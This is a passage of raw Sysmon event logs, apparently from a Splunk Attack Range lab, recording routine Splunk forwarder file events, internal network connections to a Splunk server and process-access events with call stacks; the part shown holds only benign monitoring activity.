AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD06C53B74AC012846CB391ACDD33B1,SHA256=266A086E65678B82988035E6677F55BBE706EC9E8381BE09EB39A020D3966C1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:09.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=799B03B6CAA47061D950D0321AEC7C1C,SHA256=55C42DBC8D9E6449E609B4D4A1D6A1DEFB5AE90CFA46B0DE9BDBD0C773C932B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:10.364{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D03617D074AF9120ADC4E2925231179,SHA256=155053CA84525849755B7A544DD6E149B58CE8884FA9176A73998ADCC257C8A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:10.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D6435BBD8027B694BB9D6B8CB40AC1,SHA256=23F1B16AFFD01E5C216D69A59ACF32D957C8C96DB48533C30A97455B485430E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:11.458{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF6FE7F386100B10F9CEBD84B709A32,SHA256=6C7C92824D3E74A3C9A8E8AB4E0E692F1FE491FE2A4579A9401C992097F84D60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:11.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5FD78BF7DCB022BADB28EE8872C776,SHA256=C876B9A3B5AF105E8358E625620A109F824A197214D98BDCDF48C7BA2A7AAB38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:08.621{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53277-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:12.474{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE24D76EFB8F21EEF4FE4F58B95059F9,SHA256=4EB5BA19EF1FF91480425F3414B1F4E8955F2B65C8E2E57CF8C5FA1260B5BB85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:12.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3984B67EE4F851B389E2C4E032528F8,SHA256=595E6F2E3A374C467982D8604B8D9ED43CCD3B3BE17553D04086E3D8C089ED8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:13.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C99BC218F48C66CA784059F17F76899,SHA256=05179F0F82AEC5B2BACA8F193742464BCC73301450386883F88E10623EB22E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:13.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B988EFBE4FB893EB90DC1BF82AE1A2,SHA256=637BF5E826594705549935B163B3CB2689BB2AAAD53E00D33CF36A4205E5F5E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:14.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C196704BB8971E9C9646175C25D8046,SHA256=7254E6875944CB38C302C21C842D0671F6446F17C01472394CE87756BEF59B9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:15.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=704C041B9193E88A954DDD852A70B717,SHA256=8AF4AAA688D47D7BDCC9D02D9CB6369DEA7C677DE3B746EAFCD4F4AD7435B1A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:12.493{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51215-false10.0.1.12-8000- 23542300x8000000000000000214822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:15.006{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C6B025227EAA96A7684AA630DCCC309,SHA256=CE5428B8EB2FBF3420C31427EA7A2FC076EAA96718547B3BF165B7A3F615EBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:16.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0E28BFD244199D650784481929185E,SHA256=2234F93F37D51A0314557A9B6229984560407E5F0104E8C5FB234102B9EF8885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:16.053{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F2F4B1D58F8BDB6967E11914DE5045,SHA256=E060644262EA67D968C4A6B6ED686CE8E198BA58B00E9D450485767E4283BBA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:17.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94A7C0317DCD943BE226D96CB0CBA41A,SHA256=7C3D9D38654F36A3D6CF518C13A6D1380CC47FC626E03456382AAE7FA1C4C464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:17.068{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C18B268D1348D08C62BF9142BFCA397A,SHA256=F7D9F2F624A8420E31A71AF692196F40AB54DC522966434F5578A444DCA8926F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:14.559{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53278-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:18.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31B6715503D4AB00F51D4B522B70EDB0,SHA256=305DADF9253CB952B00C774E209508409D84101A804FD9F2381CA8CA58724BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:18.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD52CAF957B87139C20E71201A2F6E8C,SHA256=700EFFBD7F59888B2633BF3D49B2BC7538B517F10B5175ADC3C7284B80CD027B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F13-6216-BE04-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F13-6216-BE04-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.958{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F13-6216-BE04-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.959{C8EA50B7-0F13-6216-BE04-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.739{C8EA50B7-0F13-6216-BD04-000000003802}49002652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C212DAC785556E8CAF677558EE85AD46,SHA256=0324208A1F8BB21F0547A60BC0087E79D49EB607BAE819B8506ED18ED46EA8CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F13-6216-BD04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0F13-6216-BD04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.458{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F13-6216-BD04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 